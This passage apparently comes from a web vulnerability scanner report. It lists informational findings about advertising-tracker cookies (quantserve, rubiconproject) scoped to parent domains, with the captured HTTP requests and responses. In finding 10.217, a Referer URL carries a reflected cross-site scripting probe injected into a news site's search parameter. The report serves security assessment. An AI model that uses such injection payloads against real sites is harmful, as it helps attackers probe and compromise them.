rsi_us_1000000="pUM14zlDOBYUrmdq3jOQH6NG/UTjJLypNPMu8j89fd7oQaFd1yGE6g8BwU8BLTkNk43VN7eq0QNSW3IUkipUfWkQxlkMV5zKMnApLMfGK0r32a4sukSz2iJdtYf9XH36phtyM/9lq1L56zCW6wi1OjQJnw+6Avik/yIfTcqDu+JM8zqIKUJ1HwIhfcRn2t1zZ/GPwqflRKv7mR+TJcv0TSt5Rune8VjEOJ5hQ71NNMFrxR7WvxNWyaW7FHWOcC6qsd3KuBSfNJ3cRwXuemPMT8pUP32kcMrvWfGrGMeEiG2/7YWZyY+XOMTrFf9MEMHFxJqZv9fNearG8ptA0vJ+hj8yM/2MzwuI1l5oQQFgxUuvL5LSyR2+NFa7BqDzjQdE6E1YTWlmAPl/smXvHSD1tAVxetfz644PwEj5N9wcTCMOX5jhR1hdXAnwanlV3g46w3j6TdU6lSif011GBEllhrXXVZ0JH7my5Yn+U1taQ2wR7fmxpLosoOhYuiu1gnMjpAgB/ZAlSpzkL2XizhuRHKq9+jiA+Yhx8CxujLYsOWyvK7k9/82hMhHRl1FJD/6WeFCMiFUp5j8U/dm8THod2HersTn/McYGbGinDXzhXokO/aXIt14z2SupxJWhBkHfP8ST8pIHswZ6Z2xMcD71tuL47ybOMNLL46DE/MsPZQ539zRAUqAUjx3fg6q4imUphYisBILkFwnJ0yl3FiNjhVWOgbINcopH46sBRlN7AMRulZCEuXUrYDFiPtipA/Km3zEwB1s3Hwu8u218uLe9kbfohQ8gmvQdYeMI8IKcfAF1p1ulJQ1LWyi/A367NsXyMmyV19R6EJEhSt/+201gC9PkMP55jmkDWOK/vtspMx6UA/CiP1s2wEOGHUjLEZYXCZ7OOlwF7WuMs+HlVnGJMCGlnVdNEcAZMc5QnWDRp0Oc1bghYQeJvHMNdzQgymDNjO/LWn2jSoBvengATfrNfGS9nwJd6U505Kt2QcpCP3+YCL7DaNTAkwJ3j2UnpWi2h84s2LnGNl9dErMzcF19XpL0bP7oa9xw/+areqQLrfIHtaEHDWC/IpCvCY8HNxkqymONGlO2BGaryGiLprWiq2AV4Bxh2O6KMhHInF9NBWifl1F9Q33GFXcICIHlnOXGMM6YpV4jOD1xv369Oj2Wv+caauUvwx+Bvph95wN2N+4OQM8Nb+UBgQvYSiyIaAsSjQhlzSiwU2O+95kIVVAc2V8PPZC0h4hdxDHSr7+Fz7B8HeW6gk2WMVQ9FUPp+1KD4A764ii7wb1Y+2MYLiw5W7qe9h1ghwYJcgV0ZfCL2gQNsFj3HWQf4kxkqUUaRBwJr3IKaEsjWOT1qq9DuBwYT9DtsYK0TbFcYAMqPfyXM9mmXNF7Ccv7t4zGIsRsDuvR7f7cgcv0Pa18W6+ikvgeVaUhqti+8AanTjXkhnqyuKzJRV6vjlA+cs2L3OQeJBVE1scDS4LvG1wWc/OBPdgh0bS0nRG+rUCSpWOjHcUdhHI8cNU3dTw7I6LH9XFkMpMQw/M/swO1npTO9sI3Bzb0gOO+0m//SgiVoDyB4Z0Qw8Kn3l+Hqf0XTi78ZqlhyagMnEMt60uy2z+wktSuZxnt4n9cEmWbPQ6UWTftzhFZAmP0VxLarpFh1fhUCkWhO/+ks0QZR1LebJUkLKHZ/c9QxKJvsZ0l28lMgpve2psChVVVsVH7qovl7znk03BUdt1bu5I/3ND43LiX25yi1RRMXQsvxFB53Facr4L3KD/TerWRH6Z1UNYYqbFc7uSEHGabiNUw"; rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uzs22rMriQJ4Ym1N1EuC/pV+zq2jLxL9z1pFHcD2oMpIyt/lxMhiEkgSkH9IHZeBImHWKCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa0AbFjW9PtKIFHNv4PL1RUaJzrH2RPUn836DjPQ4L4Uubj0NaY9wI2qjpCay/9h6Y4N/vrTyarBrZyP2Qo9LvjZr/OJH+Vp17fC86WjHf9zGKgiUktukRMj4LRehh7y8xF6zjVFodjh6IkR4q2kn1HgDrHHSn2wSS2EDsTwaZJzJbLqZMkNrSImiblvpjzTLrAhSx+RS2e/MDHClFjR980FHfMOgxYJJD2ucHt+c1zy/DzpTtOofPJp3WEiz3GSk6b/ibMhz73R4RzvzCBLcmuBS31n3/zpEOEBfxWRal9OB482ey9t/I3GZDd+XghxAXHgVo+J3cPPTAl3vUjSchmwUix8cw9WutYc8yd0N5Ie6hC4JqDP2kPo9QD8S0j+8Ul7xB69URWn+gVej8rRrkI0Xpli4zlykdxmJnAdHw7uyeGF/hc+OsTS+l6tg0GrX144xa9futac3QPazCPEeAeLcz6iSOHYRk7u6LyZ8TiE7fVoIl33Jhjq0NLcj6ie2F0+WZOOen2Iuk5ZAbz6ympB6lcs06EOyo=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOheXIQT7uItGF29/yo/tk8g7ZPQt8El+O6vsJSum2NB/leM3NskvAjloepK63+nuNJXDsrq4xoUabTBovG12bYtsNz7Ao3U4T4c828xyLWWNlcMSklFjL3l2VgeOKC+J5znJwPRxJOUJBXR9BOb0in8rTuPvTzdZZfAePiWl5LSsogNJomDCF3VwWHhUno5GVPQlsUYnsmKo93ec3l97uRk+XFTftWQe+LFw0ydkk7nzYWQa2594W8VhRHY8hMTkLA+ebbmK6C9cu0L9eiewtsiV114KM6xywZeLfwtrBBWC6wXH4EiQ60ZtZ9HjC65us4EZtryH4d89UJuHuI2+Pj0TLKI7o6DzI9QVfQwgAvQ8pOissEUSF4PlTW84QuxfJUnBabEg3/LDlToXvABg1h+tm66pzNl7K4zty3avS9TQkjyPXb4prWAJZ2EJkRmrkZexi3ZQMvHJ0ZtyNv/CzYfZ4oS/mBuqs3BkTI0c9KWNC+jFwp2RGN4K+YxJpJj4RWgZvpx9SgHo7xrptyFxQDiBbF5vtksKQ/9jsq5u1tJ8Wi87OdhAm/aYKqdei0ZS9nNgSfG3Vc1cS/Koxt2e+5/nJiB06achvUFqhmTPbVqtERJt85jcH97w4hNkdQpdMbyvMW9Xi9V7j/Qxckcv09; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 19:19:21 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 19:19:21 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.215. http://pixel.quantserve.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

d=ECIBlgEBgAeBUNXqk-WW0a1LKvgQCkAAsgwgDma-IDCOFeEBDLSUMA4RBwHRHhMA0bswpeFAMFChA9FOEA_TCoHRxw6dKkENpJSYfhGjuRM; expires=Wed, 14-Sep-2011 19:27:43 GMT; path=/; domain=.quantserve.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=1390118961;fpan=1;fpa=P0-665808856-1308252464224;ns=0;url=http%3A%2F%2Fsoundcloud.com%2F;ref=;ce=1;je=1;sr=1920x1200x32;enc=n;ogl=;dst=1;et=1308252464224;tzo=300;a=p-47_zcqmJsLHXQ HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://soundcloud.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dcd4b82-3e074-feeab-8b152; d=EFABlAEBgAeBUNXqk-WW0a1LKvgQCkAAsgwgDma-IM4V4QEMtJQwDhEHAdEeEwDRuzCl4UAwUKED0U4QD9MKgdHHDp0qQQ2klJh-EaO5Ew

Response

HTTP/1.1 302 Found
Connection: close
Location: http://ad.yieldmanager.com/pixel?id=977075&t=2
Set-Cookie: d=ECIBlgEBgAeBUNXqk-WW0a1LKvgQCkAAsgwgDma-IDCOFeEBDLSUMA4RBwHRHhMA0bswpeFAMFChA9FOEA_TCoHRxw6dKkENpJSYfhGjuRM; expires=Wed, 14-Sep-2011 19:27:43 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Thu, 16 Jun 2011 19:27:43 GMT
Server: QS

10.216. http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/pixel/p-e4m3Yko6bFYVc.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

d=EAMBlgEBgQeBcNXqk-WW0a1LKvgQCkAAsgwgDma-IDCOFeEBDLSUMA4RBwHRHhMA0bswpeFAMFChA9FOEA_TCoHRxw6dKkENpJSYfhGjuRM; expires=Thu, 15-Sep-2011 10:10:54 GMT; path=/; domain=.quantserve.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel/p-e4m3Yko6bFYVc.gif?labels=Television,NewsAndReference HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308305453032&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fburp%2Fshow%2F8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dcd4b82-3e074-feeab-8b152; d=ECIBlgEBgAeBUNXqk-WW0a1LKvgQCkAAsgwgDma-IDCOFeEBDLSUMA4RBwHRHhMA0bswpeFAMFChA9FOEA_TCoHRxw6dKkENpJSYfhGjuRM

Response

HTTP/1.1 200 OK
Connection: close
Set-Cookie: d=EAMBlgEBgQeBcNXqk-WW0a1LKvgQCkAAsgwgDma-IDCOFeEBDLSUMA4RBwHRHhMA0bswpeFAMFChA9FOEA_TCoHRxw6dKkENpJSYfhGjuRM; expires=Thu, 15-Sep-2011 10:10:54 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Content-Type: image/gif
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 35
Date: Fri, 17 Jun 2011 10:10:54 GMT
Server: QS

GIF89a.......,.................D..;

10.217. http://pixel.quantserve.com/seg/p-9eJ8k4iSzux46.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/seg/p-9eJ8k4iSzux46.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

d=ENMBLwGBB4GTA-qT4vrhAguOEPUIMECOMOyzAA; expires=Thu, 15-Sep-2011 10:12:05 GMT; path=/; domain=.quantserve.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /seg/p-9eJ8k4iSzux46.js HTTP/1.1
Host: pixel.quantserve.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss3a34b%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E7c5fa54ba36cca68&categories=exclude&searchboxinput=xss
Cookie: d=EK8BLwH9BoGSA-qT4vrhAguOEPUIMECOMOyzAA; mc=4de7d9f5-818ca-b5c9d-42237

Response

HTTP/1.1 200 OK
Connection: close
Set-Cookie: d=ENMBLwGBB4GTA-qT4vrhAguOEPUIMECOMOyzAA; expires=Thu, 15-Sep-2011 10:12:05 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Content-Type: application/x-javascript
ETag: "S21538:E0-100703054-1308305525254"
Cache-Control: private, no-transform, must-revalidate, max-age=600
Expires: Fri, 17 Jun 2011 10:22:05 GMT
Content-Length: 482
Date: Fri, 17 Jun 2011 10:12:05 GMT
Server: QS

function _qcdomain2(){
var d=document.domain;
if(d.substring(0,4)=="www.")d=d.substring(4,d.length);
var a=d.split(".");var len=a.length;
if(len<3)return d;
var e=a[len-1];
if(e.length<3)return
...[SNIP]...

10.218. http://pixel.rubiconproject.com/di.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.rubiconproject.com
Path:	/di.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1; expires=Tue, 13-Dec-2011 11:28:38 GMT; path=/; domain=.rubiconproject.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /di.php?v=2372||2373|0||2374|0||&r=3761|0,3169,3578,3577,2110,2195,2196,2197,2579,2198,4134,3734,2199,2364,2362,2363,2200,3810,2111,2494,2201,3513,2202,2496,2202,2496,2203,2204,2189,2112,2497,2205,2355,2495,5838,3811,3512,2109,3812,2239,2190,2206,2113,2206,2113,4552,2765,6184,2240,4105,4193,2372,2373,2374,2375, HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; ruid=154dd07bb6adc1d6f31bfa10^6^1307963581^2915161843; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; lm="13 Jun 2011 11:13:38 GMT"; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1%265720%3D1%262372%3D1%263810%3D1%262374%3D1%264214%3D1; rpx=5671%3D11993%2C298%2C3%2C%2C%264212%3D11993%2C682%2C3%2C%2C%265421%3D11993%2C682%2C3%2C%2C%264940%3D12109%2C14%2C2%2C%2C%264894%3D12124%2C0%2C2%2C%2C%267259%3D12124%2C145%2C2%2C%2C%265852%3D12124%2C0%2C1%2C%2C%264210%3D12124%2C0%2C1%2C%2C%264214%3D12267%2C471%2C2%2C%2C%264338%3D12401%2C0%2C3%2C%2C%26733%3D12401%2C0%2C1%2C%2C%267100%3D12419%2C0%2C1%2C%2C%266198%3D12424%2C82%2C2%2C%2C%266560%3D12435%2C57%2C2%2C%2C%266643%3D12441%2C56%2C2%2C%2C%266432%3D12470%2C0%2C1%2C%2C%265576%3D12675%2C0%2C1%2C%2C%262827%3D12675%2C0%2C1%2C%2C%265573%3D12675%2C0%2C1%2C%2C%265720%3D12675%2C0%2C1%2C%2C%263810%3D12675%2C0%2C1%2C%2C%262374%3D12675%2C0%2C1%2C%2C%262372%3D12738%2C0%2C1%2C%2C; put_1197=3460050161923843111; cd=false; khaos=GOVBRMNC-I-DXQD

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 11:28:38 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1; expires=Tue, 13-Dec-2011 11:28:38 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

10.219. http://pixel.rubiconproject.com/tap.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.rubiconproject.com
Path:	/tap.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%262197%3D1%262579%3D1%263512%3D1%263810%3D1%262374%3D1%267249%3D1; expires=Sat, 16-Jul-2011 17:56:22 GMT; path=/; domain=.rubiconproject.com
put_2146=xn7ja41kw4np53teeikidoecxeh9fu6s; expires=Sat, 16-Jul-2011 17:56:22 GMT; path=/; domain=.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=7249&nid=2146&put=xn7ja41kw4np53teeikidoecxeh9fu6s&expires=30 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://uac.advertising.com/wrapper/aceUACping.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rpx=5671%3D11993%2C298%2C3%2C%2C%264212%3D11993%2C682%2C3%2C%2C%265421%3D11993%2C682%2C3%2C%2C%264940%3D12109%2C14%2C2%2C%2C%264894%3D12124%2C0%2C2%2C%2C%267259%3D12124%2C145%2C2%2C%2C%265852%3D12124%2C0%2C1%2C%2C%264210%3D12124%2C0%2C1%2C%2C%264214%3D12267%2C471%2C2%2C%2C%264338%3D12401%2C0%2C3%2C%2C%26733%3D12401%2C0%2C1%2C%2C%267100%3D12419%2C0%2C1%2C%2C%266198%3D12424%2C82%2C2%2C%2C%266560%3D12435%2C57%2C2%2C%2C%266643%3D12441%2C56%2C2%2C%2C%266432%3D12470%2C0%2C1%2C%2C%265576%3D12675%2C0%2C1%2C%2C%265573%3D12675%2C0%2C1%2C%2C%265720%3D12675%2C0%2C1%2C%2C%262372%3D12738%2C0%2C1%2C%2C; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%262197%3D1%262579%3D1%263512%3D1%263810%3D1%262374%3D1; cd=false; csi2=1300433.js^25^1308237983^1308246981&3173951.js^1^1308241389^1308241389&2553662.js^15^1308233336^1308240157&1295118.js^1^1308235192^1308235192&3187870.js^20^1308226504^1308234260&1295153.js^2^1308228373^1308233637&3206203.js^2^1308230851^1308232093&3183300.js^1^1308227126^1308227126; rdk15=0; ses15=11953^70; csi15=1300434.js^27^1308237982^1308246986&3173952.js^1^1308241079^1308241079&2553663.js^20^1308234261^1308240767&1295121.js^1^1308235497^1308235497&1295156.js^2^1308233638^1308233949&3187871.js^25^1308225219^1308233336&3206204.js^3^1308225202^1308227128; rdk=6451/11953; rdk2=1; ses2=11953^61

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 17:56:22 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%262197%3D1%262579%3D1%263512%3D1%263810%3D1%262374%3D1%267249%3D1; expires=Sat, 16-Jul-2011 17:56:22 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=5671%3D11993%2C298%2C3%2C%2C%264212%3D11993%2C682%2C3%2C%2C%265421%3D11993%2C682%2C3%2C%2C%264940%3D12109%2C14%2C2%2C%2C%264894%3D12124%2C0%2C2%2C%2C%267259%3D12124%2C145%2C2%2C%2C%265852%3D12124%2C0%2C1%2C%2C%264210%3D12124%2C0%2C1%2C%2C%264214%3D12267%2C471%2C2%2C%2C%264338%3D12401%2C0%2C3%2C%2C%26733%3D12401%2C0%2C1%2C%2C%267100%3D12419%2C0%2C1%2C%2C%266198%3D12424%2C82%2C2%2C%2C%266560%3D12435%2C57%2C2%2C%2C%266643%3D12441%2C56%2C2%2C%2C%266432%3D12470%2C0%2C1%2C%2C%265576%3D12675%2C0%2C1%2C%2C%265573%3D12675%2C0%2C1%2C%2C%265720%3D12675%2C0%2C1%2C%2C%262372%3D12738%2C0%2C1%2C%2C%267249%3D12753%2C0%2C2%2C%2C%262112%3D12753%2C0%2C1%2C%2C%262497%3D12753%2C0%2C1%2C%2C%262202%3D12753%2C0%2C1%2C%2C%262496%3D12753%2C0%2C1%2C%2C%262197%3D12753%2C0%2C1%2C%2C%262579%3D12753%2C0%2C1%2C%2C%263512%3D12753%2C0%2C1%2C%2C%263810%3D12753%2C0%2C1%2C%2C%262374%3D12753%2C0%2C1%2C%2C; expires=Sat, 16-Jul-2011 17:56:22 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_2146=xn7ja41kw4np53teeikidoecxeh9fu6s; expires=Sat, 16-Jul-2011 17:56:22 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

10.220. http://pixel.rubiconproject.com/tap.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.rubiconproject.com
Path:	/tap.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%262197%3D1%262579%3D1%263512%3D1%263810%3D1%262374%3D1%267249%3D1%264222%3D1; expires=Sun, 17-Jul-2011 10:42:26 GMT; path=/; domain=.rubiconproject.com
put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; expires=Sun, 17-Jul-2011 10:42:26 GMT; path=/; domain=.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=4222&nid=1512&put=4dd07bc8-e97b-118c-3dec-7b8c5c306530 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/creditcards/platinum-prestige-credit-card/11858/8/?linkid=WWW_1010_CARD_TGAFF01_Z_Z_01_T_CP85808EW
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%262197%3D1%262579%3D1%263512%3D1%263810%3D1%262374%3D1%267249%3D1; rpx=5671%3D11993%2C298%2C3%2C%2C%264212%3D11993%2C682%2C3%2C%2C%265421%3D11993%2C682%2C3%2C%2C%264940%3D12109%2C14%2C2%2C%2C%264894%3D12124%2C0%2C2%2C%2C%267259%3D12124%2C145%2C2%2C%2C%265852%3D12124%2C0%2C1%2C%2C%264210%3D12124%2C0%2C1%2C%2C%264214%3D12267%2C471%2C2%2C%2C%264338%3D12401%2C0%2C3%2C%2C%26733%3D12401%2C0%2C1%2C%2C%267100%3D12419%2C0%2C1%2C%2C%266198%3D12424%2C82%2C2%2C%2C%266560%3D12435%2C57%2C2%2C%2C%266643%3D12441%2C56%2C2%2C%2C%266432%3D12470%2C0%2C1%2C%2C%265576%3D12675%2C0%2C1%2C%2C%265573%3D12675%2C0%2C1%2C%2C%265720%3D12675%2C0%2C1%2C%2C%262372%3D12738%2C0%2C1%2C%2C%267249%3D12753%2C0%2C1%2C%2C%262112%3D12753%2C0%2C1%2C%2C%262497%3D12753%2C0%2C1%2C%2C%262202%3D12753%2C0%2C1%2C%2C%262496%3D12753%2C0%2C1%2C%2C%262197%3D12753%2C0%2C1%2C%2C%262579%3D12753%2C0%2C1%2C%2C%263512%3D12753%2C0%2C1%2C%2C%263810%3D12753%2C0%2C1%2C%2C%262374%3D12753%2C0%2C1%2C%2C; put_2146=xn7ja41kw4np53teeikidoecxeh9fu6s; csi2=1300433.js^40^1308237983^1308251958&3173951.js^1^1308241389^1308241389&2553662.js^15^1308233336^1308240157&1295118.js^1^1308235192^1308235192&3187870.js^20^1308226504^1308234260&1295153.js^2^1308228373^1308233637&3206203.js^2^1308230851^1308232093&3183300.js^1^1308227126^1308227126; ruid=154dd07bb6adc1d6f31bfa10^8^1308305453^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses15=11953^1; csi15=1295121.js^2^1308235497^1308305453&1300434.js^43^1308237982^1308251958&3173952.js^1^1308241079^1308241079&2553663.js^20^1308234261^1308240767&1295156.js^2^1308233638^1308233949&3187871.js^25^1308225219^1308233336&3206204.js^3^1308225202^1308227128; cd=false

Response

HTTP/1.1 200 OK
